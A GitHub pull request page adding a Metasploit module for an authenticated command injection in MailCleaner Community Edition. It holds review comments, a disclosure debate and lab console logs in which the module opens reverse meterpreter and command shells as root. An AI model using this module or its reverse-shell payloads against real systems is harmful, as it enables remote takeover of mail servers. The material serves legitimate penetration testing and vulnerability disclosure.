Adding Module MailCleaner Remote Code Execution Module #11148

Merged
merged 9 commits into from Jan 8, 2019

8 participants
@mmetince
Contributor

mmetince commented Dec 19, 2018

Hi fellas 🎉

This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/mailcleaner
  • Set RHOST
  • Set LHOST
  • Set USERNAME
  • Set PASSWORD
  • Run exploit
  • Verify that you are seeing Awesome..! Authenticated.
  • Verify that you are getting meterpreter session.

Technical Details and MSF Module in Asciinema
https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/

@wvu-r7


Contributor

wvu-r7 commented Dec 19, 2018

Hi, @mmetince! Welcome back. :P

@wvu-r7 wvu-r7 added the feature label Dec 19, 2018

@jmartin-r7


Contributor

jmartin-r7 commented Dec 19, 2018

Looks like latest update made msftidy sad. Only the warning about newline is required.

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/linux/http/mailcleaner_exec.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/linux/http/mailcleaner_exec.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
@wvu-r7


Contributor

wvu-r7 commented Dec 20, 2018

@mmetince: It sounds like you're in @jrobles-r7's very capable hands now. Thanks!

@todb-r7


Contributor

todb-r7 commented Dec 20, 2018

Hi @mmetince -- I'm assuming there hasn't been any coordinated vuln disclosure (CVD) on this, so I'm going to clue the vendor in and see about securing a CVE from DWF at https://iwantacve.org/ (since it's open source software), using this PR as a reference. Cool with you, I assume?

In the future, if you'd like to play along with CVD and maybe /not/ drop 0day on unsuspecting users, I would be happy to help disclose this stuff on your behalf per Rapid7's disclosure policy. Your bug, your choice, of course, but limiting surprises like this is usually more neighborly. :)

@mmetince


Contributor Author

mmetince commented Dec 20, 2018

Hi @todb-r7, it's cool ofc.

I fully understand what you are saying. I would like to share my thoughts regarding the 0day disclosure case like this one.

Every single one of my research projects goes like this: focus on the technical details, find a 0day, prepare a write-up and msf modules, and then report it to the vendor. When the vulnerability requires authentication and the vendor doesn't respond rapidly, I go with full disclosure because I don't want to go back to the project after a couple of weeks/months. It's like a waste of time when you try to remember all the technical stuff that you've done before (product installation steps etc., the msf landing process which requires lots of changes, thanks to people like @wvu-r7 🙏).

Cheers,

{
'SSL' => true,
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'


@jrobles-r7

jrobles-r7 Dec 21, 2018

Contributor

Move to the target with python

Suggested change
'Payload' => 'python/meterpreter/reverse_tcp'
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['unix'],


@jrobles-r7

jrobles-r7 Dec 21, 2018

Contributor

Each target specifies its platform. This can be removed.

Suggested change
'Platform' => ['unix'],


@wvu-r7

wvu-r7 Dec 21, 2018

Contributor

I would add all the platforms to the top-level Platform. Same for Arch. Otherwise they won't display in info. Someone can fix that if they want.


@wvu-r7

wvu-r7 Dec 21, 2018

Contributor
msf5 exploit(linux/http/mailcleaner_exec) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/mailcleaner_exec.rb b/modules/exploits/linux/http/mailcleaner_exec.rb
index 361cbeab8a..cf92c85b10 100644
--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5,
           'Payload'  => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['unix'],
-      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      #'Platform'       => ['unix'],
+      #'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
       'Targets'        =>
         [
           [
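Review bot: commenting out the top-level 'Platform' and 'Arch' (the two `+      #'Platform'` / `+      #'Arch'` lines) leaves nothing for `info` to display, which is exactly why the Platform: and Arch: fields come back empty in the output captured in this comment. Rather than dropping the keys, keep them at the top level and list the union of what the targets declare, e.g. 'Platform' => ['python', 'unix'] and 'Arch' => [ ARCH_PYTHON, ARCH_CMD ], so that `info` reflects both targets while each target entry still narrows its own platform and architecture.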
msf5 exploit(linux/http/mailcleaner_exec) > info
[snip]
   Platform:
       Arch:
[snip]
msf5 exploit(linux/http/mailcleaner_exec) >


@mmetince

mmetince Dec 22, 2018

Author Contributor

Is it okay to leave the 'targets' section as it is and add all the platforms to the top-level platforms, something like the following?

      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],
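As an added example, not framework code and not part of this PR, the following Ruby derives the top-level 'Platform'/'Arch' from a 'Targets' array shaped like the snippet above and flags the mismatch wvu-r7 observed in `info` (empty top-level keys) as well as a declared platform or arch that no target can use. The values of ARCH_PYTHON and ARCH_CMD are assumed stand-ins for the framework constants, the metadata hash is a constructed copy of the snippet, and the helper names are mine.

```ruby
# Added example (not Metasploit Framework code): derive and validate the
# top-level 'Platform'/'Arch' of a module's info hash from its 'Targets'.
# ARCH_PYTHON / ARCH_CMD are assumed stand-ins for the framework constants.
ARCH_PYTHON = 'python'
ARCH_CMD    = 'cmd'

# Constructed copy of the metadata shape discussed in the PR review.
MODULE_INFO = {
  'Platform' => ['python', 'unix'],
  'Arch'     => [ARCH_PYTHON, ARCH_CMD],
  'Targets'  => [
    ['Python payload',  { 'Platform' => 'python', 'Arch' => ARCH_PYTHON }],
    ['Command payload', { 'Platform' => 'unix',   'Arch' => ARCH_CMD,
                          'Payload' => { 'BadChars' => "\x26" } }]
  ]
}

# Union of every target's Platform/Arch, in declaration order, no duplicates.
def derive_top_level(info)
  platforms = []
  arches = []
  info['Targets'].each do |_name, opts|
    platforms.concat(Array(opts['Platform']))
    arches.concat(Array(opts['Arch']))
  end
  { 'Platform' => platforms.uniq, 'Arch' => arches.uniq }
end

# Returns a list of problems; empty when the top-level keys cover every target
# (which is what `info` displays) and declare nothing that no target can use.
def check_top_level(info)
  problems = []
  derived = derive_top_level(info)
  %w[Platform Arch].each do |key|
    declared = Array(info[key])
    if declared.empty?
      problems << "#{key} missing at top level: info would show it empty"
      next
    end
    missing = derived[key] - declared
    extra = declared - derived[key]
    problems << "#{key} lacks #{missing.inspect}" unless missing.empty?
    problems << "#{key} declares #{extra.inspect} with no target" unless extra.empty?
  end
  problems
end

# Characters of a command-string payload that collide with a target's BadChars
# (the command target above forbids "&", which a shell treats as a separator).
def bad_chars_present(command, target_opts)
  bad = target_opts.dig('Payload', 'BadChars').to_s
  command.chars.uniq.select { |c| bad.include?(c) }
end

if __FILE__ == $0
  p derive_top_level(MODULE_INFO)
  p check_top_level(MODULE_INFO)
  # Same metadata with the top-level keys removed, as in the commented-out diff.
  stripped = MODULE_INFO.reject { |k, _| %w[Platform Arch].include?(k) }
  p check_top_level(stripped)
end
```

Running the file prints the derived union, an empty problem list for the full metadata, and two "missing at top level" problems for the stripped copy; the check is meant to be run over a module's info hash before landing so that `info` and the per-target declarations cannot drift apart.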

jrobles-r7 and others added some commits Dec 22, 2018

Update documentation/modules/exploit/linux/http/mailcleaner_exec.md
Co-Authored-By: mmetince <mmetince@users.noreply.github.com>
Update documentation/modules/exploit/linux/http/mailcleaner_exec.md
Co-Authored-By: mmetince <mmetince@users.noreply.github.com>
@mmetince


Contributor Author

mmetince commented Jan 3, 2019

ping

@wchen-r7


Contributor

wchen-r7 commented Jan 4, 2019

pong!

I believe Jacob is actively working on this PR, so no worries, this will be landed :-)

jrobles-r7 added some commits Jan 8, 2019

@jrobles-r7


Contributor

jrobles-r7 commented Jan 8, 2019

Tested on MailCleaner Community Edition

msf5 > use exploit/linux/http/mailcleaner_exec
msf5 exploit(linux/http/mailcleaner_exec) > set username admin
username => admin
msf5 exploit(linux/http/mailcleaner_exec) > set password MCPassw0rd
password => MCPassw0rd
msf5 exploit(linux/http/mailcleaner_exec) > set rhosts 172.22.222.132
rhosts => 172.22.222.132
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 172.22.222.132
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.132:49783) at 2019-01-08 13:01:38 -0600

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : mailcleaner
OS              : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.132 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/mailcleaner_exec) > set target 1
target => 1
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Command shell session 3 opened (172.22.222.136:4444 -> 172.22.222.132:49789) at 2019-01-08 13:02:00 -0600

whoami
root
uname -a      
Linux mailcleaner 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13) x86_64 GNU/Linux
^C
Abort session 3? [y/N]  y

@jrobles-r7 jrobles-r7 merged commit a0acfa7 into rapid7:master Jan 8, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Jan 8, 2019

msjenkins-r7 added a commit that referenced this pull request Jan 8, 2019

@jrobles-r7


Contributor

jrobles-r7 commented Jan 8, 2019

Release Notes

The mailcleaner_exec exploit module has been added to the framework. This exploits an authenticated command injection vulnerability in the MailCleaner Community Edition product.

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request Jan 23, 2019

Add CVE-2018-1000999 to MailCleaner module
See PR rapid7#11148

This adds the new CVE assigned by DWF for this vulnerability.

Note that [CVE-2018-10933](https://www.cvedetails.com/cve/CVE-2018-10933/)
describes a vulnerability in libssh, but this one describes the issue as
it pertains to MailCleaner specifically.

@todb-r7 todb-r7 referenced this pull request Jan 23, 2019

Merged

Add CVE-2018-1000999 to MailCleaner module #11304
